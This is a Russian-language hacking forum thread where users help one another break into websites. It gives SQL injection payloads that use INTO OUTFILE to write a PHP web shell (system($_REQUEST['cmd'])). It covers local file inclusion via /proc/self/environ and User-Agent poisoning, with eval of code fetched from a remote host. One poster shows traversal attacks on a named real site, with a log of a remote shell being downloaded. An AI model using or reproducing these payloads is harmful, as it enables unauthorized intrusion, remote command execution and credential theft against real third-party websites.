To Konqi , спс !

To Jokester

короче
сделал запрос : union+select+@@datadir+--+

в ответ мне выдало :
/var/lib/mysql/ipw18/

-----------
вот с чего я начал :union+select+version()+into+outfile+'/tmp/1.txt+--+
мне выдало :
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /hermes/bosweb/web292/b2929/ipw.****(site name **/public_html/****(site name **/code/page_functions.php on line 40

дальше: union+select+load_file('/tmp/1.txt')+--+
мне выдало : version 5.............
-------------

к чему я это все, каким образом мне узнать директорию куда надо залить шелл для его чтения в виде site.ru/shell?cmd=dir .... ну или как поступить ?

не ругайся насяльника Jokester

/hermes/bosweb/web292/b2929/ipw.****(site name **/public_html/****(site name **/
вот сам же полный путь и скрыл значить в курсе что это путь до веба ? ))

короче если сделаешь так
union+select+version()+into+outfile+"/hermes/bosweb/web292/b2929/ipw.****(site name **/public_html/****(site name **/version.txt"+--+
если есть права на запись , если нет ищи другие папки
то в вебе можешь вызвать site.com/version.txt и все
а вместо этого файла можешь залить полноценный шелл ....
======
допустим название твоего сайта XXXL.com
тогда делаем так
+and+1=0+Union+Select+NULL,NULL,NULL,NULL"<? system($_REQUEST['cmd']); ?>",NULL,NULL+INTO+OUTFILE "/hermes/bosweb/web292/b2929/XXXL.com/public_html/XXXL.com/shell.php"
после вызовем
www.XXXL.com/shell.php?cmd=dir или ls смотря какая ОС

shell_c0de
Синтаксис только поправь в запросах (кавычки и слеши), а то он так никогда не разберётся

И да, ось там разумеется unixlike, это по путям видно

Как заинклюдить через LFI конфиги phpmyadmin и/или CPanel, что бы посмотреть акки пользователей. Возможно такое?

Если есть (LFI) инклуд попробуй просто залить шелл и через него посмотреть скрипты/конфиги вариантов много ...
а так прочитай конфиги
/var/lib/mysql/my.cnf
/etc/mysql/my.cnf
/etc/my.cnf
или дефолтные пути ПМА
для начало просто инклуди индекс и смотри что куда инклудится в скриптах и про /proc/self/environ не забудь прочитать

Изначально пытался залить шелл через /proc/self/environ и User Agent, пробовал по разному через system и copy облом, только одним способом получилось просмотреть корневую директорию <?eval(file_get_contents('http://********.ru/1.txt'));?>, а при попытке перехода или открытия файла кидает на 404 страницу, вообще я понимаю из за чего это происходит. Должно быть так index.php?e=eval(file_get_contents('http://********.ru/1.txt')); но как это сделать если я вставляю код через User Agent. Вообще у меня мало опыта может я что то упустил

всем привет!
случай такой,есть инклуд файлов,
http://www.aiesec-berlin.de/KDK/index.php?load=file
вот вроде как найшел error_logs причем они одинаковые..
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/2
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/6

удалось впихнуть в них свой код:
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/6%00<? include('http://shell.narod.ru/testing.php');?>

в ответ в логах вижу это:
http://shell.narod.ru/testing.php => `testing.php' Resolving shell.narod.ru... 213.180.199.41 Connecting to shell.narod.ru|213.180.199.41|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 23,104 (23K) [application/octet-stream] testing.php: Permission denied Cannot write to `testing.php' (Permission denied)

ребят есть сайтег,в общем restore базы phpbb => как всегда profile.php?mode=editprofile&cmd=phpinfo();

интересно то что несколько раз мне нормально выдал phpinfo, а вот сейчас делаю тот же запрос но идет редирект на index.php, или на какой то другой скрипт(vraag.php?url=profile_data.php)

подскажите с чем это может быть связано,что profile.php не работает..